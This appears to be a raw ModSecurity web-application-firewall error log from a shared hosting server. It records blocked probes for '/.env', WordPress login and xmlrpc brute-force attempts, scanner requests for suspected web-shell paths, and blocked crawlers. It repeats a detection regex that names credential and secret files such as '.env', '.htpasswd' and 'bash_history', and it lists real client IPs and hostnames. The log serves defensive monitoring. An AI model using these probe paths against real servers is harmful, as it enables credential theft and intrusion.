[Tue May 26 16:53:37.594001 2026] [security2:error] [pid 823496:tid 823683] [client 176.65.139.235:41136] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mmajaypackersmovers.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWCuZa08mrtyBNpA4PtDAAAADc"]
[Tue May 26 16:53:38.832907 2026] [security2:error] [pid 823496:tid 823662] [client 176.65.139.238:60556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dgcwestindia.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWCupa08mrtyBNpA4PtJwAAACI"]
[Tue May 26 16:53:38.988033 2026] [security2:error] [pid 823496:tid 823681] [client 114.119.137.95:54819] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "triviewsolutions.com"] [uri "/domain-hosting-services"] [unique_id "ahWCupa08mrtyBNpA4PtLgAAADU"], referer: https://triviewsolutions.com/domain-hosting-services
[Tue May 26 16:53:39.402586 2026] [security2:error] [pid 823496:tid 823718] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCu5a08mrtyBNpA4PtPwAAAFo"]
[Tue May 26 16:53:39.402615 2026] [security2:error] [pid 823496:tid 823718] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCu5a08mrtyBNpA4PtPwAAAFo"]
[Tue May 26 16:53:39.403046 2026] [security2:error] [pid 823496:tid 823685] [client 65.21.113.244:54702] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWCu5a08mrtyBNpA4PtPQAAADk"]
[Tue May 26 16:53:39.657127 2026] [security2:error] [pid 823496:tid 823710] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCuZa08mrtyBNpA4PtEwAAAFI"]
[Tue May 26 16:53:39.981726 2026] [security2:error] [pid 823496:tid 823709] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCu5a08mrtyBNpA4PtSgAAAFE"]
[Tue May 26 16:53:39.981754 2026] [security2:error] [pid 823496:tid 823709] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCu5a08mrtyBNpA4PtSgAAAFE"]
[Tue May 26 16:53:39.982522 2026] [security2:error] [pid 823496:tid 823635] [client 65.21.113.244:60164] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWCu5a08mrtyBNpA4PtSAAAAAc"]
[Tue May 26 16:53:40.460456 2026] [security2:error] [pid 823496:tid 823662] [client 138.229.101.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCvJa08mrtyBNpA4PtUAAAACI"], referer: https://www.anujtradingco.com/
[Tue May 26 16:53:40.996537 2026] [security2:error] [pid 823496:tid 823654] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCu5a08mrtyBNpA4PtMwAAABo"]
[Tue May 26 16:53:41.464681 2026] [security2:error] [pid 823496:tid 823660] [client 117.198.37.168:59933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCvZa08mrtyBNpA4PtagAAACA"]
[Tue May 26 16:53:41.464839 2026] [security2:error] [pid 823496:tid 823660] [client 117.198.37.168:59933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCvZa08mrtyBNpA4PtagAAACA"]
[Tue May 26 16:53:41.743573 2026] [security2:error] [pid 823496:tid 823635] [client 138.229.101.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCvZa08mrtyBNpA4PtdwAAAAc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1269108&moderation-hash=57662f704f881e53c004c6784758c3bd
[Tue May 26 16:53:41.999056 2026] [security2:error] [pid 823496:tid 823721] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCvZa08mrtyBNpA4PtegAAAF0"]
[Tue May 26 16:53:41.999082 2026] [security2:error] [pid 823496:tid 823721] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCvZa08mrtyBNpA4PtegAAAF0"]
[Tue May 26 16:53:41.999747 2026] [security2:error] [pid 823496:tid 823633] [client 65.21.113.244:54702] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWCvZa08mrtyBNpA4PteAAAAAU"]
[Tue May 26 16:53:42.569572 2026] [security2:error] [pid 823496:tid 823657] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCvZa08mrtyBNpA4PtZAAAAB0"]
[Tue May 26 16:53:42.600817 2026] [security2:error] [pid 823496:tid 823695] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCvpa08mrtyBNpA4PtiwAAAEM"]
[Tue May 26 16:53:42.600843 2026] [security2:error] [pid 823496:tid 823695] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCvpa08mrtyBNpA4PtiwAAAEM"]
[Tue May 26 16:53:42.601563 2026] [security2:error] [pid 823496:tid 823679] [client 65.21.113.244:60180] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahWCvpa08mrtyBNpA4PtiAAAADM"]
[Tue May 26 16:53:44.459726 2026] [security2:error] [pid 823496:tid 823680] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCwJa08mrtyBNpA4PtuwAAADQ"]
[Tue May 26 16:53:44.459756 2026] [security2:error] [pid 823496:tid 823680] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCwJa08mrtyBNpA4PtuwAAADQ"]
[Tue May 26 16:53:44.460512 2026] [security2:error] [pid 823496:tid 823715] [client 65.21.113.244:54702] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWCwJa08mrtyBNpA4PtuQAAAFc"]
[Tue May 26 16:53:45.052153 2026] [security2:error] [pid 823496:tid 823674] [client 65.21.113.244:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCwJa08mrtyBNpA4PtywAAAC4"]
[Tue May 26 16:53:45.052202 2026] [security2:error] [pid 823496:tid 823674] [client 65.21.113.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCwJa08mrtyBNpA4PtywAAAC4"]
[Tue May 26 16:53:45.053014 2026] [security2:error] [pid 823496:tid 823652] [client 65.21.113.244:60186] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWCwJa08mrtyBNpA4PtyAAAABg"]
[Tue May 26 16:53:45.067995 2026] [security2:error] [pid 823496:tid 823735] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCv5a08mrtyBNpA4PtpwAAAGs"]
[Tue May 26 16:53:46.474776 2026] [security2:error] [pid 823496:tid 823734] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCwZa08mrtyBNpA4Pt0QAAAGo"]
[Tue May 26 16:53:48.269407 2026] [security2:error] [pid 823496:tid 823704] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCwpa08mrtyBNpA4PuDQAAAEw"]
[Tue May 26 16:53:50.543285 2026] [security2:error] [pid 823496:tid 823631] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCxZa08mrtyBNpA4PuVgAAAAM"]
[Tue May 26 16:53:50.771305 2026] [security2:error] [pid 823496:tid 823654] [client 62.60.130.182:58810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWCxpa08mrtyBNpA4PufwAAABo"], referer: https://duckduckgo.com/
[Tue May 26 16:53:51.554499 2026] [security2:error] [pid 823496:tid 823665] [client 62.60.130.182:59642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.acacia.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWCx5a08mrtyBNpA4PulAAAACU"], referer: https://t.co/
[Tue May 26 16:53:51.774581 2026] [security2:error] [pid 823496:tid 823645] [client 117.198.37.168:60247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCx5a08mrtyBNpA4PunQAAABE"]
[Tue May 26 16:53:51.774743 2026] [security2:error] [pid 823496:tid 823645] [client 117.198.37.168:60247] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCx5a08mrtyBNpA4PunQAAABE"]
[Tue May 26 16:53:52.642698 2026] [security2:error] [pid 823496:tid 823620] [remote 160.250.186.220:57580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCyJa08mrtyBNpA4PusQAAZ3k"]
[Tue May 26 16:53:53.130118 2026] [security2:error] [pid 823496:tid 823644] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCx5a08mrtyBNpA4PupAAAABA"]
[Tue May 26 16:53:53.398220 2026] [security2:error] [pid 823496:tid 823680] [client 185.191.171.16:51318] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/new-years/day/2026-04-19/"] [unique_id "ahWCyZa08mrtyBNpA4Pu0wAAADQ"]
[Tue May 26 16:53:53.398325 2026] [security2:error] [pid 823496:tid 823680] [client 185.191.171.16:51318] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/new-years/day/2026-04-19/"] [unique_id "ahWCyZa08mrtyBNpA4Pu0wAAADQ"]
[Tue May 26 16:53:55.032600 2026] [security2:error] [pid 823496:tid 823676] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCyZa08mrtyBNpA4Pu0AAAADA"]
[Tue May 26 16:53:56.654031 2026] [security2:error] [pid 823496:tid 823707] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCy5a08mrtyBNpA4Pu9QAAAE8"]
[Tue May 26 16:53:58.494789 2026] [security2:error] [pid 823496:tid 823667] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCzZa08mrtyBNpA4PvGAAAACc"]
[Tue May 26 16:54:00.413896 2026] [security2:error] [pid 823496:tid 823685] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCz5a08mrtyBNpA4PvPgAAADk"]
[Tue May 26 16:54:01.121708 2026] [security2:error] [pid 823496:tid 823738] [client 114.119.129.81:55031] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/images/siliconelevators-projects07.jpg"] [unique_id "ahWC0Za08mrtyBNpA4PvZwAAAG4"], referer: https://www.siliconelevators.in/siliconelevators-gallery.php
[Tue May 26 16:54:01.913644 2026] [security2:error] [pid 823496:tid 823732] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC0Ja08mrtyBNpA4PvXQAAAGg"]
[Tue May 26 16:54:02.216064 2026] [security2:error] [pid 823496:tid 823633] [client 117.198.37.168:60568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC0pa08mrtyBNpA4PvgwAAAAU"]
[Tue May 26 16:54:02.216188 2026] [security2:error] [pid 823496:tid 823633] [client 117.198.37.168:60568] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWC0pa08mrtyBNpA4PvgwAAAAU"]
[Tue May 26 16:54:02.888327 2026] [security2:error] [pid 823496:tid 823704] [client 84.54.44.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWC0pa08mrtyBNpA4PvjwAAAEw"], referer: http://anujtradingco.com/features/header-slider-revolution/
[Tue May 26 16:54:04.538559 2026] [security2:error] [pid 823496:tid 823739] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC0pa08mrtyBNpA4PvmQAAAG8"]
[Tue May 26 16:54:04.652950 2026] [security2:error] [pid 823496:tid 823575] [remote 209.42.18.223:43222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWC1Ja08mrtyBNpA4PvvQAADUw"]
[Tue May 26 16:54:05.517661 2026] [security2:error] [pid 823496:tid 823707] [client 114.119.150.168:37771] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahWC1Za08mrtyBNpA4Pv6AAAAE8"], referer: http://glorodavionics.com/beta/index.php?route=information%2Fsitemap
[Tue May 26 16:54:06.849697 2026] [security2:error] [pid 823496:tid 823733] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC1Za08mrtyBNpA4Pv7AAAAGk"]
[Tue May 26 16:54:08.119607 2026] [security2:error] [pid 823496:tid 823638] [client 113.190.160.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC1pa08mrtyBNpA4PwAQAAAAo"]
[Tue May 26 16:54:08.502471 2026] [security2:error] [pid 823496:tid 823745] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC1pa08mrtyBNpA4PwBwAAAHU"]
[Tue May 26 16:54:09.487566 2026] [security2:error] [pid 823496:tid 823681] [client 20.12.190.196:54218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWC2Za08mrtyBNpA4PwPwAAADU"]
[Tue May 26 16:54:09.487702 2026] [security2:error] [pid 823496:tid 823681] [client 20.12.190.196:54218] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWC2Za08mrtyBNpA4PwPwAAADU"]
[Tue May 26 16:54:10.337906 2026] [security2:error] [pid 823496:tid 823641] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC2Za08mrtyBNpA4PwNQAAAA0"]
[Tue May 26 16:54:10.905901 2026] [security2:error] [pid 823496:tid 823653] [client 185.251.19.134:23737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWC2pa08mrtyBNpA4PwWQAAABk"]
[Tue May 26 16:54:11.156393 2026] [security2:error] [pid 823496:tid 823656] [client 20.12.190.196:56825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/adminfuns.php"] [unique_id "ahWC25a08mrtyBNpA4PwZAAAABw"]
[Tue May 26 16:54:11.156526 2026] [security2:error] [pid 823496:tid 823656] [client 20.12.190.196:56825] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "_dc-mx.71c7ba1f5f35.mail.stockmarketanalysis.in"] [uri "/adminfuns.php"] [unique_id "ahWC25a08mrtyBNpA4PwZAAAABw"]
[Tue May 26 16:54:11.835859 2026] [security2:error] [pid 823496:tid 823655] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWC2pa08mrtyBNpA4PwVAAAABs"]
[Tue May 26 16:54:12.232444 2026] [http2:info] [pid 839808:tid 839808] h2_workers: created with min=128 max=192 idle_ms=600000
